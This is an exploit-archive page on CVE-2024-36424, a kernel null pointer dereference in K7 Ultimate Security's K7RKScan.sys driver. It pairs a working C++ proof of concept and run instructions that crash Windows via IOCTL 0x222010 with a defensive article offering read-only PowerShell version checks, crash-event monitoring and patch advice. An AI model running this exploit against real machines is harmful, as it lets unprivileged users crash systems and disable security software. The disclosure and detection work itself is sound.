K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)

Exploit Author: M. Akil Gündoğan
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: C++
Published Date: 2025-04-10
# Exploit Title:  K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS)
# Date: 13.08.2024
# Author: M. Akil Gündoğan 
# Vendor Homepage: https://k7computing.com/
# Version: < v17.0.2019
# Tested on: Windows 10 Pro x64
# CVE ID: CVE-2024-36424

# Vulnerability Description:
--------------------------------------
In K7 Ultimate Security < v17.0.2019, the driver K7RKScan.sys (file version 15.1.0.7 in the tested build) allows local users to cause a denial of service (BSOD), or possibly have unspecified other impact, because of a null pointer dereference in the handlers for IOCTLs 0x222010 and 0x222014. In addition, the driver's device object is accessible to all users in the "Everyone" group.

# Technical details and step-by-step Proof of Concept (PoC):
--------------------------------------
1 - Load the driver from "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" into the system with OSRLoader or sc create.

2 - Compile the attached C++ PoC code in the Release configuration with VS 2022.

3 - Run the compiled PoC directly (double-click). The system crashes with a BSOD.

# Impact:
--------------------------------------
An attacker with only unprivileged local user access can crash the entire system and terminate critical processes, including any antivirus process on a system where the affected driver is loaded and in use.

# Advisories:
--------------------------------------
K7 Computing recommends that all customers update their products to the corresponding versions shown below:

K7 Ultimate Security (17.0.2019 or Higher)

# Timeline:
--------------------------------------
- 16.05.2024 - Vulnerability reported.
- 05.08.2024 - Vendor has fixed the vulnerability.
- 13.08.2024 - Released.

# References:
--------------------------------------
- Vendor: https://www.k7computing.com
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424
- Repository: https://github.com/secunnix/CVE-2024-36424

# PoC Code (C++):
--------------------------------------

/*
# Usage: Only compile it and run, boooom :)
*/
#include <windows.h>
#include <iostream>

const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path
const DWORD ioCTL = 0x222010;  // IOCTL 0x222010 or 0x222014

int main() {
    std::cout << "K7 Ultimate Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;
    HANDLE hDevice = CreateFileW(driverDevice.c_str(), // wide-char API matches the std::wstring path whether or not UNICODE is defined
        GENERIC_READ | GENERIC_WRITE,
        0,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDevice == INVALID_HANDLE_VALUE) {
        std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;
        return 1;
    }

    void* inputBuffer = nullptr; // Null input buffer
    DWORD inputBufferSize = 0;

    DWORD bytesReturned = 0;
    BOOL result = DeviceIoControl(hDevice,
        ioCTL,
        inputBuffer,
        inputBufferSize,
        nullptr,
        0,
        &bytesReturned,
        nullptr);

    if (!result) {
        std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;
    }

    CloseHandle(hDevice);

    return 0;
}


K7 Ultimate Security (K7RKScan.sys) CVE-2024-36424 — Denial of Service (DoS) Analysis & Mitigation

This article explains the CVE-2024-36424 vulnerability affecting versions of K7 Ultimate Security prior to 17.0.2019. It summarizes the root cause at a high level, the impact, detection techniques, safe verification steps, and recommended mitigations for administrators and defenders. The guidance below focuses on defense and remediation; it intentionally avoids exploit details and any instructions that would enable malicious use.

Vulnerability Summary

CVE-2024-36424 is a local Denial-of-Service vulnerability in a kernel-mode driver distributed with K7 Ultimate Security. A flaw in the driver's handling of certain I/O requests can cause a null pointer dereference in kernel space, resulting in a system crash (Blue Screen of Death) or other unstable system behavior when invoked by a low-privileged local user. The issue was fixed by the vendor in the 17.0.2019 release.

Technical (High-level) Analysis

  • The root cause is improper validation/handling of input passed to a kernel driver routine invoked via I/O control operations. When the driver assumes a pointer or structure is non-null without proper checks, dereferencing that pointer in kernel mode can trigger an immediate crash.
  • The vulnerability is significant because it resides in kernel space; a null pointer dereference there generally results in a system-wide crash rather than an isolated user-space fault.
  • The affected driver exposes an interface that, on the tested systems, could be triggered by non-privileged users; this increases the attack surface for local DoS.

Impact

  • Local Denial of Service — any unprivileged local user or process could reliably cause a system crash, leading to downtime and potential data loss.
  • Operational disruption — repeated crashes can interrupt business-critical services and processes, including endpoint protection components if they depend on the affected driver.
  • Detection/Forensics complexity — crashes may remove in-memory traces, complicating incident response and root cause determination.

Who Is Affected

Systems running K7 Ultimate Security versions older than 17.0.2019 that include the vulnerable driver are affected. The vulnerability requires local access; it is not a remote code-execution flaw. Administrators should assume all installations of the affected product prior to the fixed release are potentially vulnerable until verified otherwise.

Safe Detection & Monitoring

Defenders should monitor for signs of exploitation or attempted exploitation without attempting to reproduce the vulnerability. Useful signals include unexpected system crashes, repeated reboots with a BugCheck recorded, or abnormal termination of security processes.

# PowerShell: Query recent system crash (BugCheck) events (safe, read-only)
Get-WinEvent -FilterHashtable @{
  LogName = 'System';
  Id = 1001;               # Event ID usually used for unexpected shutdown/bugcheck reporting
  StartTime = (Get-Date).AddDays(-7)
} | Select-Object TimeCreated, Message -First 50

Explanation: This read-only query lists recent system crash reports surfaced by the operating system (event ID commonly associated with crash reports). Use it to spot increased crash frequency that might indicate exploitation attempts.

How to Check If Systems Might Be Vulnerable (Safe Verification)

Do not attempt to exercise device interfaces or send custom IOCTLs to drivers. Instead, verify product and driver versions and inspect file/service presence and permissions. The following are safe, read-only checks to locate the driver file(s) and obtain version information and file ACLs.

# PowerShell: Locate K7 driver files and report file version and ACL info (read-only)
$drivers = Get-ChildItem -Path 'C:\Program Files','C:\Program Files (x86)' -Filter 'K7RKScan.sys' -Recurse -ErrorAction SilentlyContinue
if (-not $drivers) {
  Write-Output "No K7RKScan.sys file found under Program Files paths."
} else {
  foreach ($d in $drivers) {
    $vi = $d.VersionInfo
    Write-Output "Path: $($d.FullName)"
    Write-Output "FileVersion: $($vi.FileVersion)"
    Write-Output "ProductVersion: $($vi.ProductVersion)"
    Write-Output "Owner: $((Get-Acl $d.FullName).Owner)"
    Write-Output "------"
  }
}

Explanation: This script searches typical Program Files locations for the driver file, prints file version metadata, and reports the file owner. Comparing FileVersion/ProductVersion to the vendor’s fixed release (17.0.2019) lets administrators determine whether the installed driver is older and therefore potentially vulnerable.
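Building on the version check above, here is an added example (not part of the advisory or the vendor's tooling) that turns the collected product DisplayVersion and driver FileVersion into a vulnerable/not-flagged decision, and flags unparseable version strings instead of silently skipping them. It assumes the product registers under the standard Uninstall registry keys with a DisplayName beginning "K7" (pattern assumed), and, since the page gives no fixed driver file version, treats any K7RKScan.sys build not newer than the 15.1.0.7 named in the advisory as suspect.

```powershell
$FixedProductVersion   = [version]'17.0.2019'   # fixed release named in the advisory
$AdvisoryDriverVersion = [version]'15.1.0.7'    # K7RKScan.sys build the advisory names as vulnerable

function Test-K7Exposure {
    param(
        [string]$ProductVersion,     # DisplayVersion from the Uninstall key; may be empty
        [string]$DriverFileVersion   # VersionInfo.FileVersion of K7RKScan.sys; may be empty
    )
    $findings = [System.Collections.Generic.List[string]]::new()
    $v = $null
    if ($ProductVersion) {
        if ([version]::TryParse($ProductVersion, [ref]$v)) {
            if ($v -lt $FixedProductVersion) { $findings.Add("product $v is older than fixed release $FixedProductVersion") }
        } else { $findings.Add("product version '$ProductVersion' not parseable; verify manually") }
    }
    if ($DriverFileVersion) {
        # Driver FileVersion strings sometimes carry trailing text; unparseable values are flagged, not ignored.
        if ([version]::TryParse($DriverFileVersion, [ref]$v)) {
            if ($v -le $AdvisoryDriverVersion) { $findings.Add("K7RKScan.sys $v is not newer than advisory build $AdvisoryDriverVersion") }
        } else { $findings.Add("driver version '$DriverFileVersion' not parseable; verify manually") }
    }
    $status = if (-not $ProductVersion -and -not $DriverFileVersion) { 'NotFound' }
              elseif ($findings.Count -gt 0) { 'PotentiallyVulnerable' } else { 'NotFlagged' }
    [pscustomobject]@{ Status = $status; Findings = ($findings -join '; ') }
}

function Get-K7ExposureReport {
    # Read-only: product entries from both registry views, plus the driver file on disk.
    $keys = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*',
            'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*'
    $product = Get-ItemProperty -Path $keys -ErrorAction SilentlyContinue |
               Where-Object { $_.DisplayName -like 'K7*' } | Select-Object -First 1   # name pattern assumed
    $driver  = Get-ChildItem -Path 'C:\Program Files','C:\Program Files (x86)' -Filter 'K7RKScan.sys' -Recurse -ErrorAction SilentlyContinue |
               Select-Object -First 1
    Test-K7Exposure -ProductVersion $product.DisplayVersion -DriverFileVersion $driver.VersionInfo.FileVersion
}

# Constructed sample inputs (not real inventory): one pair at or above the fixed release, one matching the advisory.
Test-K7Exposure -ProductVersion '17.0.2019' -DriverFileVersion '17.0.0.1'
Test-K7Exposure -ProductVersion '16.0.0111' -DriverFileVersion '15.1.0.7'
# On a real endpoint: Get-K7ExposureReport
```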

Recommended Remediation

  • Patch immediately: apply the vendor update that contains the fix (upgrade to 17.0.2019 or later). Vendor advisories and official packages are the authoritative source for fixes.
  • Apply via approved patch management: use your normal change control and patch distribution channels to deploy updates across the estate and verify successful installation.
  • If you cannot patch immediately, consider temporary mitigations — see the caution below — and prioritize compensating controls for exposed systems (network isolation, restricting local accounts, increasing monitoring). Contact the vendor for guidance before removing or disabling endpoint protection components.
  • After patching, validate by checking file version(s) and monitoring for crash-related events. Maintain a schedule to ensure rollouts complete across all endpoints.

Caution on Temporary Measures: Disabling or uninstalling endpoint protection can reduce your security posture. Only take such actions when coordinated with operational and security stakeholders, and preferably with vendor guidance. In many environments, vendor-supplied hotfixes or configuration changes will be safer than removal.

Detection & EDR Recommendations

  • Create or tune SIEM rules to alert on increased frequency of crash/BugCheck events and unexpected reboots on endpoints that run K7 products.
  • Monitor for abnormal termination of K7-related services or processes and correlate with system crash events.
  • Use EDR policies to restrict untrusted local code execution and to detect processes attempting to interact with kernel drivers in suspicious ways. Keep detection rules focused on behavioral indicators rather than product-specific IO control values.
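As an added example (not from the advisory or the article's own scripts) serving both the crash-event query in the Safe Detection section and the SIEM tuning points above, the following PowerShell counts crash-related System-log events per endpoint inside a sliding window and reports endpoints that reach a threshold; it runs offline on constructed records shaped like Get-WinEvent output. The service-name pattern 'K7*' and the sample service name are assumptions; the event IDs and provider names are the standard Windows ones.

```powershell
$CrashSignals = @{    # real Windows System-log sources: BugCheck, Kernel-Power, Service Control Manager
    'Microsoft-Windows-WER-SystemErrorReporting' = @(1001)   # bugcheck (BSOD) report
    'Microsoft-Windows-Kernel-Power'             = @(41)     # reboot without clean shutdown
    'Service Control Manager'                    = @(7034)   # service terminated unexpectedly
}

function Find-CrashBursts {
    param(
        [Parameter(Mandatory)][object[]]$Events,     # Get-WinEvent records or look-alike objects
        [int]$Threshold = 3,                         # events inside one window that raise an alert
        [timespan]$Window = [timespan]::FromHours(24),
        [string]$ServicePattern = 'K7*'              # assumed: the product's service names start with K7
    )
    $hits = foreach ($e in $Events) {
        $ids = $CrashSignals[$e.ProviderName]
        if (-not $ids -or $ids -notcontains $e.Id) { continue }
        # Keep 7034 only when it is the security product's own service that died.
        if ($e.Id -eq 7034 -and $e.Message -notlike "The $ServicePattern service terminated*") { continue }
        $e
    }
    # Per endpoint, slide a window over the sorted timestamps; report the first burst found.
    foreach ($grp in ($hits | Group-Object MachineName)) {
        $times = @($grp.Group | Sort-Object TimeCreated | ForEach-Object { $_.TimeCreated })
        for ($i = 0; ($i + $Threshold - 1) -lt $times.Count; $i++) {
            $j = $i + $Threshold - 1
            if (($times[$j] - $times[$i]) -le $Window) {
                [pscustomobject]@{ MachineName = $grp.Name; TotalEvents = $times.Count
                                   BurstFrom = $times[$i]; BurstTo = $times[$j] }
                break
            }
        }
    }
}

# Constructed sample records (not real telemetry), shaped like Get-WinEvent output.
$t0 = Get-Date '2024-08-13T09:00:00'
function New-SampleEvent($Machine, $Provider, $Id, $Minutes, $Message = '') {
    [pscustomobject]@{ MachineName = $Machine; ProviderName = $Provider; Id = $Id
                       TimeCreated = $t0.AddMinutes($Minutes); Message = $Message }
}
$sample = @(
    New-SampleEvent 'WS01' 'Microsoft-Windows-WER-SystemErrorReporting' 1001 0
    New-SampleEvent 'WS01' 'Microsoft-Windows-Kernel-Power' 41 2
    New-SampleEvent 'WS01' 'Service Control Manager' 7034 5 'The K7 Example service terminated unexpectedly.'
    New-SampleEvent 'WS02' 'Microsoft-Windows-WER-SystemErrorReporting' 1001 0
    New-SampleEvent 'WS02' 'Service Control Manager' 7034 30 'The Print Spooler service terminated unexpectedly.'
)
Find-CrashBursts -Events $sample | Format-Table   # WS01 has three signals in 5 minutes; WS02 has one qualifying signal
# Live use: Find-CrashBursts -Events (Get-WinEvent -FilterHashtable @{ LogName='System'; Id=1001,41,7034; StartTime=(Get-Date).AddDays(-7) })
```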

Best Practices & Hardening

  • Enforce least privilege: avoid granting unnecessary local accounts elevated rights that can interact with kernel drivers.
  • Keep endpoint protection and other security tooling up to date through automated patching and vendor notification subscriptions.
  • Maintain robust logging, centralize event collection, and establish baselines so deviations triggered by crashes or tampering are visible quickly.
  • Use change management to validate driver and product updates and to ensure rollbacks are possible if an update causes issues.

Vendor Response and Timeline

Event                    Date
Vulnerability reported   2024-05-16
Vendor fix released      2024-08-05
Public disclosure        2024-08-13

References and Further Reading

Final Notes for Administrators

Prioritize patching across your environment, validate that fixes have been applied, and monitor endpoints for residual signs of instability. If you observe repeated unexplained crashes on endpoints with K7 products installed, collect relevant logs (system event logs, crash dumps) and coordinate with your vendor for analysis. Avoid attempting exploit reproduction in production environments — the safest course is patching and monitoring.